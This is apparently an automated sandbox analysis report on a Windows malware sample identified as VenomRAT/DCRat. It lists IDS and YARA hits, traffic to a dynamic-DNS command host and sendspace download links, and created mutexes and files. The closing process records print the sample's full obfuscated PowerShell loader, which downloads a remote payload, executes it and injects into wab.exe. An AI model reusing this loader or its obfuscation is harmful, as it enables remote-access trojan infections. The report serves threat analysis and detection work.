        Source: TrafficSnort IDS: 2052265 ET TROJAN Observed Malicious SSL Cert (VenomRAT) 12.202.180.134:8890 -> 192.168.2.5:62798
        Source: TrafficSnort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 12.202.180.134:8890 -> 192.168.2.5:62798
        Uses dynamic DNS services
        Source: unknownDNS query: name: xvern429.duckdns.org
        Source: global trafficTCP traffic: 192.168.2.5:62798 -> 12.202.180.134:8890
        Source: Joe Sandbox ViewIP Address: 69.31.136.17 69.31.136.17
        Source: Joe Sandbox ViewIP Address: 12.202.180.134 12.202.180.134
        Source: Joe Sandbox ViewIP Address: 172.67.170.105 172.67.170.105
        Source: Joe Sandbox ViewASN Name: FISERV-INCUS FISERV-INCUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /pro/dl/7yi2fu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /pro/dl/lt00vw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n3.sendspace.comConnection: Keep-AliveCookie: SID=ns2pmla9s88ipijkujilaccdr6
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /pro/dl/7yi2fu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /pro/dl/lt00vw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n3.sendspace.comConnection: Keep-AliveCookie: SID=ns2pmla9s88ipijkujilaccdr6
        Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
        Source: global trafficDNS traffic detected: DNS query: fs03n4.sendspace.com
        Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: fs03n3.sendspace.com
        Source: global trafficDNS traffic detected: DNS query: xvern429.duckdns.org
        Source: powershell.exe, 00000006.00000002.2437943823.0000000002F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
        Source: wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wab.exe, 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc
        Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB5BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs03n4.sendspace.com
        Source: powershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000003.00000002.2607346916.0000027AF1971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
        Source: powershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: wab.exe, 00000009.00000003.2435277716.0000000005437000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/
        Source: wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/2
        Source: wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJX
        Source: wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/om:443
        Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspaX
        Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com
        Source: powershell.exe, 00000003.00000002.2527053630.0000027AD9C64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027AD9C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB5A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea
        Source: powershell.exe, 00000003.00000002.2527053630.0000027AD9C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n4.sendspace.comX
        Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000003.00000002.2527053630.0000027ADAC36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
        Source: wab.exe, 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
        Source: powershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/7yi2fuP
        Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/7yi2fuXR
        Source: wab.exe, 00000009.00000002.3251440257.0000000020560000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2422890302.0000000005430000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/lt00vw
        Source: wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/lt00vw5
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62797
        Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:62796 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:62797 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: amsi32_7056.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: powershell.exe PID: 6100, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: wab.exe PID: 6120, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Very long command line found
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6540
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6564
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6540Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6564Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024C2968 NtProtectVirtualMemory,9_2_024C2968
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024C2510 NtProtectVirtualMemory,9_2_024C2510
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848F1B8C23_2_00007FF848F1B8C2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848F1AB163_2_00007FF848F1AB16
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024CC2989_2_024CC298
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024C76109_2_024C7610
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024C7EE09_2_024C7EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024C1D989_2_024C1D98
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024C72C89_2_024C72C8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024C25109_2_024C2510
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024C1D509_2_024C1D50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_024C1D879_2_024C1D87
        Source: amsi32_7056.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: powershell.exe PID: 6100, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: wab.exe PID: 6120, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: classification engineClassification label: mal100.troj.evad.winCMD@13/9@6/3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Preaffirmative.SpoJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyvypyxf.wnr.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6100
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7056
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
